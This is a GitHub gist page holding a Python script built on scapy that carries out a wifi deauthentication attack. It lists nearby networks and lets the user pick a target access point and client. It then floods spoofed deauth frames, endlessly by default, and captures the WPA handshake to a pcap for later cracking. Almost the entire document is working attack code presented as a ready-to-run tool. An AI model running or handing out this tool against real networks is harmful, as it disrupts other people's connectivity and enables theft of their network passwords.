Skip to content

Instantly share code, notes, and snippets.

@joni2back

joni2back/deauth.py

Forked from garyconstable/deauth.py
Created August 15, 2018 15:25
Show Gist options
  • Save joni2back/f6f9e9af580ab63e3f4b2f58e050ec6e to your computer and use it in GitHub Desktop.
Save joni2back/f6f9e9af580ab63e3f4b2f58e050ec6e to your computer and use it in GitHub Desktop.
Download ZIP
Python Networking Wifi Deauth Attack
Raw
deauth.py
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
from sys import platform
"""
OSX Devices
networksetup -listallhardwareports
"""
"""
Capture Hand Shake
"""
class CaptureHandShake():
"""
Init
"""
def __init__(self, iface):
self.wpa_handshake = []
self.iface = iface
self.acceptAny = False
self.packetMax = 100
self.packetCount = 0
"""
Handle the packets
"""
def handle_packet(self, packet):
if self.acceptAny == True:
print packet.summary()
self.wpa_handshake.append(packet)
self.packetCount += 1
if self.packetCount == self.packetMax:
filename = "pcaps/wpa-handshake-" + str(datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")) + ".pcap"
wrpcap(filename, self.wpa_handshake)
self.wpa_handshake = []
self.acceptAny = False
self.packetCount = 0
else:
#got EAPOL KEY packet
if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
print packet.summary()
self.wpa_handshake.append(packet)
#if we have 4 packets
if len(self.wpa_handshake) >= 4:
self.acceptAny = True
print "\n"
print '='*100
print "\n"
"""
Start the sniffer
"""
def start(self):
os.system("clear")
print '='*100
print "Sniffing on interface: " + self.iface
print '='*100
sniff(iface=self.iface, prn=self.handle_packet)
"""
Deauth Attack Class
"""
class deauth:
"""
Deauth class constructor
"""
def __init__(self, interface):
self.interface = interface
self.networks = {}
self.stop_sniff = False
self.signal = signal
self.channel_hop = None
self.target_bssid = ""
self.interupted = False
self.listenKeyboard = None
"""
Turn on monitor mode
"""
def monitorMode(self):
os.system("ifconfig " + self.interface + " down")
os.system("iwconfig " + self.interface + " mode monitor")
os.system("ifconfig " + self.interface + " up")
"""
Start the network sniffer
"""
def start_sniffer(self):
os.system("clear")
print '='*100
print "\nPress CTRL+c to stop sniffing..\n"
print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
channel_hop = Process(target = self.channel_hopper, args=(self.interface,))
channel_hop.start()
stopsniff = False
sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stopsniff, prn=lambda x: self.add_network(x) )
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
stopsniff = True
"""
Swicth wifi channels
"""
def channel_hopper(self, interface):
while True:
try:
channel = random.randrange(1,13)
os.system("iwconfig %s channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
"""
Add a found network to the list
"""
def add_network(self, pckt):
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
channel = int(ord(pckt[Dot11Elt:3].info))
if bssid not in self.networks:
self.networks[bssid] = ( essid, channel )
print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)
"""
Stop hopping channels
"""
def stop_channel_hop(self, signal, frame):
self.stop_sniff = True
self.channel_hop.terminate()
self.channel_hop.join()
"""
Stop the niff
"""
def keep_sniffing(self, pckt):
return self.stop_sniff
"""
Send Deauth packets
"""
def perform_deauth(self, bssid, client, count):
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count:
print 'Press CTRL+C to quit'
count = int(count)
while count != 0:
try:
for i in range(64):
# Send out deauth from the AP
send(pckt)
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
# If count was -1, this will be an infinite loop
count -= 1
except KeyboardInterrupt:
break
"""
Get the target to attack
"""
def getTarget(self):
print "\n\n"
print '='*100
target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
self.target_bssid = target_bssid
while target_bssid not in self.networks:
target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
self.target_bssid = target_bssid
if target_bssid == 'q':
sys.exit(0)
# Get our interface to the correct channel
print 'Changing ' + self.interface + ' to channel ' + str(self.networks[target_bssid][1])
os.system("iwconfig %s channel %d" % (self.interface, self.networks[target_bssid][1]))
print "\n\n"
print '='*100
"""
Loop for client packets on the selected channel
"""
def sniffClients(self):
interupted = False
try:
sniff(iface=self.interface, prn=self.getClients, stop_filter=interupted )
while True:
time.sleep(1)
except KeyboardInterrupt:
interupted = True
"""
Get the clients for the BSSID
"""
def getClients(self, pkt):
bssid = pkt[Dot11].addr3
target_bssid = self.target_bssid
if target_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
print pkt.summary()
"""
Packet Info
"""
def pktInfo(self, pkt):
bssid = pkt[Dot11].addr3
p = pkt[Dot11Elt]
cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}""{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
ssid, channel = None, None
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 0:
ssid = p.info
elif p.ID == 3:
channel = ord(p.info)
elif p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in cap:
crypto.add("WEP")
else:
crypto.add("OPN")
print " %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )
"""
Attack the target
"""
def attackTarget(self):
print "\n\n"
print '='*100
# Now we have a bssid that we have detected, let's get the client MAC
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
print "\n\n"
print '='*100
if not deauth_pckt_count:
deauth_pckt_count = -1
self.perform_deauth(self.target_bssid, target_client, deauth_pckt_count)
def main():
"""
Set the command line options
"""
parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')
"""
Get the command line options
"""
args = parser.parse_args()
conf.iface = args.iface
"""
Create the deauth class and begin the attack
"""
#create class instance
de = deauth(args.iface)
# if turn on monitor mode
if args.monitor != "" and args.monitor != None:
de.monitorMode()
#start the ssid sniffer
de.start_sniffer()
#choose target
de.getTarget()
#sniff for client mac's
de.sniffClients()
#attack the target
de.attackTarget()
#capture the handshake packets
sn = CaptureHandShake(args.iface)
sn.start()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment